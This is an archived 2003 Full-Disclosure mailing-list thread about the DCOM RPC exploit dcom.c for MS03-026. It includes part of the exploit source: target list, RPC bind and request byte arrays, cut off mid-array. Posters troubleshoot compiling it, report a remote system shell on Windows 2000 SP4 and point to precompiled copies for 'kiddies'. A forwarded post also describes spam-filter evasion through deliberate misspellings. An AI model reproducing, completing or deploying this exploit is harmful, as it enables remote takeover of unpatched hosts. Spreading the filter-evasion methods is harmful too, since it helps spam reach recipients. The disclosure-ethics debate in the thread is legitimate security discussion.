> malware anyway since all they have to do is sniff the wire if they're
> searching for correct methodology.
>
>
> Chris Paget wrote:
>
> > 
> > I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing this
> > code.  Really guys, sterling job.  Now the skript kiddies and VXers have got
> > virtually no work to do in order to write a worm that exploits this.
> > 
>
> Only those who mistakenly believe that hiding information from the masses
> will stop those who have the knowledge and intent to cause harm could feel
> this way.
>
> > Personally, I'm tempted to set up my firewall to NAT incoming requests on port
> > 135 to either www.metasploit.com or www.xfocus.org.  I know this is the
> > full-disclosure list, but working exploit code for an issue this huge is taking
> > it a bit far, especially less than 2 weeks after the advisory comes out.
>
> It wouldn't matter if it were 2 months.
>
> > Cheers, fellas.  When the worm comes out, I'll be thinking of you.
>
> Think of the joke sold to millions of people masquerading as an operating system
> coded by unemployed vms programmers, and visual basic "experts" instead.
>
> Len
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread w g
http://illmob.org/rpc/ is my current directory for newer 'as i get them' rpc tools... if anyone has anything to add to it please feel free to email me
-illwill
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Neeko Oni
1) It's a one-shot attack.  Pick the wrong SP, no go.  Whatever worm comes of
this will be limited by this fact.

2) It'll be another week before most of these "kiddies" figure out how to 
compile any exploit released.  "ware is erreer.h!!!" etc.

3) Two weeks.. if that's not long enough to patch up, you can't really blame
the exploit writer(s).

4) I don't like guns.  People kill people with guns.  Do I blame the murderers
for pulling the trigger or do I blame the gun producers for making the gun?
Hint:  This is different than "Should people make guns or not?"

5) NAT'ing incoming requests to other hosts.. nice.  First off, NAT was the 
wrong choice of buzzword.  Next, do you really want it looking like you're 
attempting to exploit either of those sites?  Furthermore.. what's the point?
Are you trying to DoS those hosts?  Nice.  Whine about the actions of others
while participating in a DoS attack.  Good job.  You must be a mental giant.
 
I can tell you're one of those guys who spent the night at your colo trying to
patch SQL while Slammer hit.  

.Neek

> 
> 
> 
> 
> I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing this
> code.  Really guys, sterling job.  Now the skript kiddies and VXers have got
> virtually no work to do in order to write a worm that exploits this.
> 
> 
> 
> Personally, I'm tempted to set up my firewall to NAT incoming requests on port
> 135 to either www.metasploit.com or www.xfocus.org.  I know this is the
> full-disclosure list, but working exploit code for an issue this huge is taking
> it a bit far, especially less than 2 weeks after the advisory comes out.
> 
> Cheers, fellas.  When the worm comes out, I'll be thinking of you.
> 
> Chris
> 
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Paul M. Hirsch
On Sat, Jul 26, 2003 at 07:34:17PM -0500, Elvar wrote:
> Anyone gotten this to compile in FreeBSD 4.8-stable?
> 
> <[EMAIL PROTECTED]:elvar>gcc -o dcom dcom.c
> dcom.c:25: error.h: No such file or directory

Change line 10 to:

#include 

Compiles fine on OpenBSD-current/i386.  It failed to exploit
my W2Ksp3 and XPsp1 boxes/victims.

-Paul

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Len Rose
Disclaimer: I'm not supposed to have an opinion about anything
other than how the list functions but I'm weak and unable to
resist this one.

Hi Chris,

I don't feel that your position is valid. Once the vulnerability was
announced then it was inevitable. I'm surprised that you feel that
security by obscurity is a valid stance. Even those who have released
"harmless" scanners have in fact aided those who would be writing such
malware anyway since all they have to do is sniff the wire if they're
searching for correct methodology. 


Chris Paget wrote:

> 
> I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing this
> code.  Really guys, sterling job.  Now the skript kiddies and VXers have got
> virtually no work to do in order to write a worm that exploits this.
> 

Only those who mistakenly believe that hiding information from the masses
will stop those who have the knowledge and intent to cause harm could feel
this way.

> Personally, I'm tempted to set up my firewall to NAT incoming requests on port
> 135 to either www.metasploit.com or www.xfocus.org.  I know this is the
> full-disclosure list, but working exploit code for an issue this huge is taking
> it a bit far, especially less than 2 weeks after the advisory comes out.

It wouldn't matter if it were 2 months.

> Cheers, fellas.  When the worm comes out, I'll be thinking of you.

Think of the joke sold to millions of people masquerading as an operating system 
coded by unemployed vms programmers, and visual basic "experts" instead.

Len

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread christopher neitzert
Works brilliantly now.  ...totally forgot that I filter 135 among other
things on 802.11 segments.

this exploit is pure evil...
ironic that it was announced by [EMAIL PROTECTED]

chris
On Sat, 2003-07-26 at 15:37, christopher neitzert wrote:
> I've managed to compile it under gcc 3.2.2 without error, yet
> it doesn't seem to do anything but hang itself against XP Professional
> hosts, as I haven't a 2k box available to test against.
> 
> chris
> 
> 
> 
> On Sat, 2003-07-26 at 17:25, Justin Shin wrote:
> > >03-026 working exploit
> > 
> > Anyone had any luck compiling any of these exploits? I continue to receive 
> > compiler warnings whether I use gcc or a dgc.
> > 
> > -- Justin Shin
> > 
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html





RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread CompSecGeek
Compiled perfectly on my RH9 box.  The exploit failed to work against 
three W2K SP4 boxes though.  Going to try my XP hosts next.

--CSG



On Sat, 26 Jul 2003 at 17:25 -0400 Justin Shin was heard to utter:

JS> >03-026 working exploit
JS> 
JS> Anyone had any luck compiling any of these exploits? I continue to receive
JS> compiler warnings whether I use gcc or a dgc.
JS> 


-- 
This message has been scanned for viruses and
dangerous content by MailScanner/Sophos on 
mail.digitalvoodoo.org and is believed to be clean.
--

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Elvar
Anyone gotten this to compile in FreeBSD 4.8-stable?

<[EMAIL PROTECTED]:elvar>gcc -o dcom dcom.c
dcom.c:25: error.h: No such file or directory
<[EMAIL PROTECTED]:elvar>gcc -v
Using builtin specs.
gcc version 2.95.4 20020320 [FreeBSD]



Kind regards,
Elvar

- Original Message - 
From: "gml" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; "'Justin Shin'" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 6:12 PM
Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)


> This exploit works exceptionally well.  Frighteningly well.
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of christopher
> neitzert
> Sent: Saturday, July 26, 2003 3:38 PM
> To: Justin Shin
> Cc: [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)
>
> I've managed to compile it under gcc 3.2.2 without error, yet
> it doesn't seem to do anything but hang itself against XP Professional
> hosts, as I haven't a 2k box available to test against.
>
> chris
>
>
>
> On Sat, 2003-07-26 at 17:25, Justin Shin wrote:
> > >03-026 working exploit
> >
> > Anyone had any luck compiling any of these exploits? I continue to receive
> > compiler warnings whether I use gcc or a dgc.
> >
> > -- Justin Shin
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> -- 
> Christopher Neitzert http://www.neitzert.com/~chris
> chris<>neitzert{dot}com - GPG Key ID: 7DCC491B
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Chris Paget



I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing this
code.  Really guys, sterling job.  Now the skript kiddies and VXers have got
virtually no work to do in order to write a worm that exploits this.



Personally, I'm tempted to set up my firewall to NAT incoming requests on port
135 to either www.metasploit.com or www.xfocus.org.  I know this is the
full-disclosure list, but working exploit code for an issue this huge is taking
it a bit far, especially less than 2 weeks after the advisory comes out.

Cheers, fellas.  When the worm comes out, I'll be thinking of you.

Chris



On Sat, 26 Jul 2003, [EMAIL PROTECTED] wrote:

> 03-026 working exploit
>
>
> -
>
> This email was sent using FREE Catholic Online Webmail.
> http://webmail.catholic.org/
>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread w g
there is a first version compiled and ready for the kiddies on my site http://illmob.org also have eeye's RPC scanner to check for vulnerable boxes. also waiting for a newer version supposedly from xfocus that has a few fixes etc... ill let ya know
 
illwill

morning_wood <[EMAIL PROTECTED]> wrote:

> there is a compiled version at http://illmob.org ... ( 'tanks illwill )
>
> w00d
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread gml
This exploit works exceptionally well.  Frighteningly well.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of christopher
neitzert
Sent: Saturday, July 26, 2003 3:38 PM
To: Justin Shin
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

I've managed to compile it under gcc 3.2.2 without error, yet
it doesn't seem to do anything but hang itself against XP Professional
hosts, as I haven't a 2k box available to test against.

chris



On Sat, 2003-07-26 at 17:25, Justin Shin wrote:
> >03-026 working exploit
> 
> Anyone had any luck compiling any of these exploits? I continue to receive
> compiler warnings whether I use gcc or a dgc.
> 
> -- Justin Shin
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-- 
Christopher Neitzert http://www.neitzert.com/~chris
chris<>neitzert{dot}com - GPG Key ID: 7DCC491B

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread morning_wood
there is a compiled version at http://illmob.org ... ( 'tanks illwill )

w00d
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread hicks
Confirmed working on Windows 2000 SP4; compiled under Red Hat 9 with gcc,
gives a remote system shell. Cheers



- Original Message - 
From: "Justin Shin" <[EMAIL PROTECTED]>
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 5:25 PM
Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)


> >03-026 working exploit
>
> Anyone had any luck compiling any of these exploits? I continue to receive
> compiler warnings whether I use gcc or a dgc.
>
> -- Justin Shin
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Javier Liendo
hello

dcom.c compiled fine (gcc version 3.2 20020903 (Red
Hat Linux 8.0 3.2-7)) and worked as advertised...

Regards

javier


--- Justin Shin <[EMAIL PROTECTED]> wrote:
> >03-026 working exploit
> 
> Anyone had any luck compiling any of these exploits?
> I continue to receive compiler warnings whether I
> use gcc or a dgc.
> 
> -- Justin Shin
> 
> ___
> Full-Disclosure - We believe in it.
> Charter:
http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread christopher neitzert
I've managed to compile it under gcc 3.2.2 without error, yet
it doesn't seem to do anything but hang itself against XP Professional
hosts, as I haven't a 2k box available to test against.

chris



On Sat, 2003-07-26 at 17:25, Justin Shin wrote:
> >03-026 working exploit
> 
> Anyone had any luck compiling any of these exploits? I continue to receive compiler 
> warnings whether I use gcc or a dgc.
> 
> -- Justin Shin
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-- 
Christopher Neitzert http://www.neitzert.com/~chris
chris<>neitzert{dot}com - GPG Key ID: 7DCC491B




RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Jason Witty
I compiled it perfectly using RedHat 9 and stock GCC (v.3.2.2).  Also 
compiled using Cygwin with GCC 3.2, with just a minor tweak to remove the 
include for , as my distro didn't have that, and the exploit 
doesn't seem to really need it.

Jason

At 05:25 PM 7/26/2003 -0400, you wrote:
> >03-026 working exploit
>
> Anyone had any luck compiling any of these exploits? I continue to receive
> compiler warnings whether I use gcc or a dgc.
>
> -- Justin Shin
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Ole Myhre
Justin Shin wrote:

> >03-026 working exploit
>
> Anyone had any luck compiling any of these exploits? I continue to receive compiler warnings whether I use gcc or a dgc.

Compiled perfectly here. And the exploit works perfectly as well.

--
Ole Myhre
Tlf: +47 55 91 61 00
Mob: +47 45 21 27 60
"If you don't have any humor, you don't take life seriously enough."

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread tcpdumb
Compiled without any problems

System Info:

Linux beast 2.6.0-test1 #31338 Wed Jul 23 05:08:59 CEST 2003 i686 unknown

gcc --version   :   2.95.4

Maybe a hint:

- It's always useful having masses of development stuff aboard, like libc6
and several versions of gcc or other compilers.

- The OS I compile an exploit on depends on the exploit itself.
  Never seen an OpenSSH exploit running on Linux. Therefore I
  got a computer with OpenBSD. Windows exploits like SMBnuke
  work on all unices (even OSF-1, Solaris - cool thing).

Haven't tried the DCOM exploit yet but this is just a question of time. Next to me
there is a computer running Win2000 Server. I'll try it as soon as my girlfriend
has stopped working on it (maybe sooner *hehe*).

Have a lot of fun!


On Sat, 26 Jul 2003 17:25:50 -0400
"Justin Shin" <[EMAIL PROTECTED]> wrote:

> >03-026 working exploit
> 
> Anyone had any luck compiling any of these exploits? I continue to receive compiler 
> warnings whether I use gcc or a dgc.
> 
> -- Justin Shin
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread Justin Shin
>03-026 working exploit

Anyone had any luck compiling any of these exploits? I continue to receive compiler 
warnings whether I use gcc or a dgc.

-- Justin Shin

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] morning_wood should stop posting xss

2003-07-26 Thread Jeremy Gaddis
On Fri, 2003-07-25 at 15:38, morning_wood wrote:
>   you are too narrow minded to even speak, broaden your horizons and
> accecpt all posibilities Ron. You are showing your ability to not
> comprehend the processes and theroetical possibilities... i feel way  sorry
> for you.. go read more books Ron.. im sure you will learn even more crap
> that keeps you in your little hole...
> quit poping out of it mmmkay..
>  you might actually see the horizon...
> 
> "the sky is falling!!!" poor Chicken Little

Tools -> Options -> Spelling -> "Always check spelling before
sending".

Enable that.

j.

-- 
Jeremy L. Gaddis   <[EMAIL PROTECTED]>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-26 Thread fulldisclosure
03-026 working exploit


-

This email was sent using FREE Catholic Online Webmail.
http://webmail.catholic.org/



/*
  DCOM RPC Overflow Discovered by LSD
   -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
   
  Based on FlashSky/Benjurry's Code
   -> http://www.xfocus.org/documents/200307/2.html
   
  Written by H D Moore 
   -> http://www.metasploit.com/
   
  - Usage: ./dcom  
  - Targets:
  -  0  Windows 2000 SP0 (english)
  -  1  Windows 2000 SP1 (english)
  -  2  Windows 2000 SP2 (english)
  -  3  Windows 2000 SP3 (english)
  -  4  Windows 2000 SP4 (english)
  -  5  Windows XP SP0 (english)
  -  6  Windows XP SP1 (english)
 
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0

Re: [Full-Disclosure] Advances in Spamming Techniques

2003-07-26 Thread Jacob Joensen
dear snot,

Would you mind taking your gay spam whining somewhere else?

Jacob

- Original Message - 
From: "security snot" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, July 25, 2003 11:38 PM
Subject: [Full-Disclosure] Advances in Spamming Techniques


> I responded to an earlier post, from a respectable security personality
> known as the dotslasher ([EMAIL PROTECTED]) with a bit of sarcasm.  I
> don't remember the incident 100%, but it was regarding a piece of spam
> that he had received, that had a fake gpg signature attached to it.
>
> Recently I've also observed certain advances on bypassing spam filters,
> which are being actively exploited out in the wild.  Since this is
> apparently a serious security-related matter (unsolicited email) I thought
> I might share the body of this email with this list, so that everyone can
> know what to watch out for in the future, and begin to develop better
> antispam security filters.
>
> 
> We meet h0t y0ung guys (18-24) all the time who want to get   fiuic ked,
> to feel a hard c0ck in their   aiss   for the very first time, and we've
> made it our mission in life to help as many of these hot   tiwinks   as
> we can. They're a horny bunch and they spend a fair amount of time
> covered in   sipunk, f1uicking  and suiciking c0ck like champions.
>
> One of our "students":
>
> Name: William Age: 18 Comments: 3 c0cks are better than 1!
> When we met William he was so shy that we teamed him up with 2 of our
> best educators... Jeff and Steven had sweet Willie suiciking  c0ck like
> an old pro in no time.
> Contents: Full-length downloadable harid core video plus 150 pics.
>
>
> Let's go?
> 
>
> Normally, spam filters will score on phrases such as "hot young guys" and
> "hard core" (and other variations, such as "hardcore"); words like
> "fucked", "cock", "sucking", etc.  In this bit of unsolicited email that I
> received after making a post to alt.gay.* (sorry, there may be minors
> reading the list and I wouldn't want them to know where they can be
> exposed to such adult conversations - here I am, exercising my right to
> limited free speech), we can observe that those filters are being bypassed
> by altering the spelling of the words and emulating "l33tspeak".
>
> Providing better regular expressions to mail filters, to account for this
> type of attack, is probably the best idea.  What we're seeing here is a
> spinoff of polymorphic shellcode and attack mechanisms (originally
> designed to bypass Intrusion Detection Systems) being applied to more
> tangible areas of technology.  It is interesting, however, to see
> technology evolve in this way.
>
> For those of you who don't understand how this could be a security-related
> matter, imagine trying to attack an "internal" mailserver on a network,
> where mail is forwarded from a spam-filtering proxy.  Normally, the
> filters on the mail proxy would drop your message in transit, before
> reaching the vulnerable mailserver.  By applying stealthlike operations on
> our spam, we're able to bypass the filters and have our malicious email
> attack the victim.
>
> I'd like to thank KF for his assistance in preparing this post, and for
> his many intelligence discussions on this mailing list.  I'd also like to
> thank his colleague dug-h0 y0ng (expl0it1t13z) for a concise and accurate
> paper on exploiting format string vulnerabilities; his paper addressed
> many things that the five-hundred other papers on the subject managed to
> do correctly.
>
> I plan on arranging an academic study into the subject of bypassing spam
> filters, and how this affects the stability of the internet.  If anyone is
> interested in working on this with me, please drop me a message.
>
> Thanks,
> -snot
>
> ---
> "Whitehat by day, booger at night - I'm the security snot."
> - CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ -
> ---
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
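The quoted post describes filter evasion by leet substitutions, letters inserted into words and words split with spaces, and suggests better regular expressions as the answer. As an added example, not from the thread or from any filter product: a normaliser that undoes those substitutions and then matches blocked phrases approximately rather than by exact regex. The blocked-phrase list uses only the two phrases the post itself names as filter triggers, and the sample inputs are constructed.

```python
"""Normalise obfuscated spam text before phrase scoring.

Added example, not from the thread. It undoes the cheap tricks the quoted
post shows (h0t y0ung, inserted letters, split words) and then matches
blocked phrases approximately instead of by exact regular expression.
"""
import re
from difflib import SequenceMatcher

# Digit/symbol substitutions commonly used in place of letters.
_LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                       "5": "s", "7": "t", "@": "a", "$": "s"})

# Phrases the quoted post says filters normally score on (constructed list).
BLOCKED_PHRASES = ("hot young guys", "hard core")


def normalize(text):
    """Lowercase, map leet characters back to letters inside words that
    contain letters, drop tokens that are only digits/punctuation, and keep
    a single space between words."""
    words = []
    for token in text.lower().split():
        if not re.search(r"[a-z]", token):
            continue  # pure numbers/punctuation such as "(18-24)" carry no words
        token = re.sub(r"[^a-z]", "", token.translate(_LEET))
        if token:
            words.append(token)
    return " ".join(words)


def _squeeze(text):
    """Remove spaces so that a word split in two ('fiuic ked') still lines up."""
    return text.replace(" ", "")


def phrase_hits(text, threshold=0.85, slack=2):
    """Return [(phrase, score)] for blocked phrases that appear in `text`
    approximately.  A window of the needle's length (plus up to `slack`
    extra characters, for letters inserted into the word) is slid over the
    squeezed text and compared with a similarity ratio, so 'harid core'
    still scores against 'hard core'."""
    haystack = _squeeze(normalize(text))
    hits = []
    for phrase in BLOCKED_PHRASES:
        needle = _squeeze(phrase)
        best = 0.0
        for width in range(len(needle), len(needle) + slack + 1):
            for start in range(max(1, len(haystack) - width + 1)):
                window = haystack[start:start + width]
                best = max(best, SequenceMatcher(None, needle, window).ratio())
        if best >= threshold:
            hits.append((phrase, round(best, 2)))
    return hits


if __name__ == "__main__":
    for sample in ("We meet h0t y0ung guys (18-24) all the time",
                   "Full-length downloadable harid core video",
                   "Meeting notes for the quarterly review"):
        print(repr(sample), "->", phrase_hits(sample))
```

The threshold trades false positives for evasion resistance: 0.85 on an eight-character needle tolerates roughly one inserted or changed character, which is the budget the quoted sample spends, while a clean sentence with no resemblance stays well below it.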


[Full-Disclosure] http://www.chiefofficer.com/particle.php?t=38

2003-07-26 Thread Georgi Guninski
Looks like "Chief Officer is a private, international community of leaders" does
not like the "OIS" sh*t much: http://www.chiefofficer.com/particle.php?t=38

georgi

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] [ANNOUNCE] kses 0.2.0

2003-07-26 Thread Ulf Harnhammar
kses 0.2.0
==========


* INTRODUCTION *


kses is an HTML/XHTML filter written in PHP. It removes all unwanted HTML
elements and attributes, no matter how malformed HTML input you give it. It
also does several checks on attribute values. kses can be used to avoid
